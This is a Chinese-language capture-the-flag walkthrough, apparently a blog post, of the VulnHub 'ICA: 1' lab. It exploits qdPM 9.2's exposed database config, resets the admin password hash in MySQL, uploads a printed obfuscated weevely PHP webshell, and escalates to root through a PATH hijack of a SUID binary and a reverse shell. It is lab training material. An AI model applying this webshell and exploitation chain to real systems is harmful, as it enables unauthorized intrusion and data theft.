- 英文名称:ICA: 1
- 中文名称:ICA: 1
- 发布日期:2021 年 9 月 25 日
- 难度:容易
- 描述:根据我们情报网络的信息,ICA 正在开展一个秘密项目。我们需要弄清楚这个项目是什么。获得访问信息后,请将其发送给我们。我们稍后会放置一个后门来访问系统。您只需关注项目是什么。您可能必须通过几层安全性。原子能机构对您将成功完成这项任务充满信心。祝你好运,代理!
- 下载地址:https://www.vulnhub.com/entry/empire-breakout,751/
ailx10
网络安全优秀回答者
网络安全硕士
去咨询
1、开局信息(IP地址:192.168.199.168)
开机
2、端口扫描,开放了22、80、3306端口,还有数据库的盐
Salt: O*IDsu\x1B Zp4BOQ#,Uo,S
端口扫描
3、查看首页,是一个登录页面,需要邮箱和密码
web首页
4、尝试扫描网站其他目录,拿到网站安装目录
网站安装目录
5、尝试查询qdPM 9.2系统漏洞
qdPM 9.2 - Password Exposure (Unauthenticated) | php/webapps/50176.txt
喜提qdPM 9.2系统漏洞
6、查看漏洞利用方式
The password and connection string for the database are stored in a yml file.
To access the yml file you can go to http://<website>/core/config/databases.yml file and download.
数据库的密码和连接字符串存储在 yml 文件中。 要访问 yml 文件,
您可以访问 http://<website>/core/config/databases.yml 文件并下载。
漏洞利用方式
7、下载yaml文件,喜提用户名和密码
qdpmadmin
UcVQCMQk2STVeS6J
喜提用户名和密码
8、登录mysql数据库
mysql -h 192.168.199.168 -u qdpmadmin -p
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| qdpm |
| staff |
| sys |
+--------------------+
进入数据库
5、进入qdpm数据库,查看包含的表
MySQL [(none)]> use qdpm
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [qdpm]> show tables;
+----------------------+
| Tables_in_qdpm |
+----------------------+
| attachments |
| configuration |
| departments |
| discussions |
| discussions_comments |
| discussions_reports |
| discussions_status |
| events |
| extra_fields |
| extra_fields_list |
| phases |
| phases_status |
| projects |
| projects_comments |
| projects_phases |
| projects_reports |
| projects_status |
| projects_types |
| tasks |
| tasks_comments |
| tasks_groups |
| tasks_labels |
| tasks_priority |
| tasks_status |
| tasks_types |
| tickets |
| tickets_comments |
| tickets_reports |
| tickets_status |
| tickets_types |
| user_reports |
| users |
| users_groups |
| versions |
| versions_status |
+----------------------+
35 rows in set (0.021 sec)
6、查看配置表,喜提web站点的用户名和密码,但是无法登录
| 1 | app_administrator_email | [email protected] |
| 2 | app_administrator_password | $P$EmesnWRcY9GrK0hDzwaV3rvQnMJ/Fx0
查看表内容
7、由于无法破解管理员的密码,但是可以修改密码
$P$EmesnWRcY9GrK0hDzwaV3rvQnMJ/Fx0 长度是34个字符,并不是简单的Hash生成的 ,而是crypt(3) Hash,是一个基于改进 DES 算法的单向散列函数,先生成明文为“ailx10”的crypt(3) Hash备用,更新密码
MySQL [qdpm]> update configuration set value="$1$m0IX0vwl$HR6rGO5FjvC39TsfOXWLK0" where id=2;
Query OK, 1 row affected (0.007 sec)
Rows matched: 1 Changed: 1 Warnings: 0
创建新的密码
8、成功登录管理员web页面
用户名:[email protected]
密码:ailx10
登录管理员后台成功
9、尝试文件上传,新增用户可以上传头像
新增用户
但是只能看到图片
上传的图片
10、切换到新用户ailx10登录,发现可以上传附件,制作webshell文件并上传
┌──(ailx10㉿kali)-[~]
└─$ weevely generate ailx10 ./ailx10.php
Generated './ailx10.php' with password 'ailx10' of 771 byte size.
┌──(ailx10㉿kali)-[~]
└─$ cat ailx10.php
<?php
$k='$k="83b70Yz5Yz04";$kYzh="e0d874Yz2ddYz5Yzb6";$kf="Yz6e6962eb8aYz35";$p=Yz"VkTYzVUW2Z';
$I='Yz(@baYzse64_decoYzde($mYz[1]),$k))Yz);$Yzo=@oYzb_get_Yzcontents()Yz;@ob_endYz_cleaYzn';
$G='zYzntYzents("php:Yz//input"),$Yzm)==1) {@obYz_Yzstart();@eYzval(@YzgzuncoYzmpress(@x';
$O='z"Yz;Yzfor(Yz$i=0;$i<$l;){for($j=0;($j<Yz$c&&Yz$i<$l);$jYz++,$i+Yz+Yz){$o.=$t{$i}Yz^$k{';
$s=str_replace('ij','','cijreatije_ijfuijncijijtion');
$P='$j}Yz;}}rYzeYzturn $o;Yz}if Yz(@prYzeg_matcYzh("Yz/$kh(.+)$YzkYzf/"Yz,@file_get_coY';
$i='MYzT1JVyFr";fYzuYzYznction x($t,$k)Yz{$c=sYztYzrlen($k);$l=sYztrlYzen($t);Yz$o="YzY';
$N='();$Yzr=@base6Yz4_eYzncodYze(@x(Yz@gzcoYzmpress($o),$YzkYz));print("$pYz$kh$rYz$kf");}';
$J=str_replace('Yz','',$k.$i.$O.$P.$G.$I.$N);
$m=$s('',$J);$m();
?>
上传附件
11、成功获得webshell
weevely http://192.168.199.168/uploads/attachments/575837-ailx10.php ailx10
获得webshell
12、寻找可疑文件,发现/opt/get_access
find / -perm -u=s 2>&1 | grep -v "Permission denied"
寻找可疑文件
13、对该文件进行分析,发现执行了cat /root/system.info
www-data@debian:/home $ ls -hl /opt/get_access
-rwsr-xr-x 1 root root 17K Sep 25 2021 /opt/get_access
www-data@debian:/home $ /opt/get_access
############################
######## ICA #######
### ACCESS TO THE SYSTEM ###
############################
Server Information:
- Firewall: AIwall v9.5.2
- OS: Debian 11 "bullseye"
- Network: Local Secure Network 2 (LSN2) v 2.4.1
All services are disabled. Accessing to the system is allowed only within working hours.
www-data@debian:/home $ strings /opt/get_access
/lib64/ld-linux-x86-64.so.2
setuid
socket
puts
system
__cxa_finalize
setgid
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
cat /root/system.info
Could not create socket to access to the system.
All services are disabled. Accessing to the system is allowed only within working hours.
;*3#34;
GCC: (Debian 10.2.1-6) 10.2.1 20210110
14、尝试设置环境变量,发现这个shell没有这个能力
更新cat 命令为shell
echo '/bin/bash' > /tmp/cat
chmod +x /tmp/cat
尝试设置环境变量
15、webshell能力很弱,更换成反弹shell,成功设置好环境变量
┌──(root㉿kali)-[/home/ailx10]
└─# find / -name "php-reverse-shell.php" 2>/dev/null
/usr/share/laudanum/php/php-reverse-shell.php
/usr/share/laudanum/wordpress/templates/php-reverse-shell.php
/usr/share/webshells/php/php-reverse-shell.php
反弹shell,设置环境变量
16、成功进阶成root权限
获得root权限
17、找出2个flag,一个普通用户,一个特权用户
2个flag
到此,实验完成~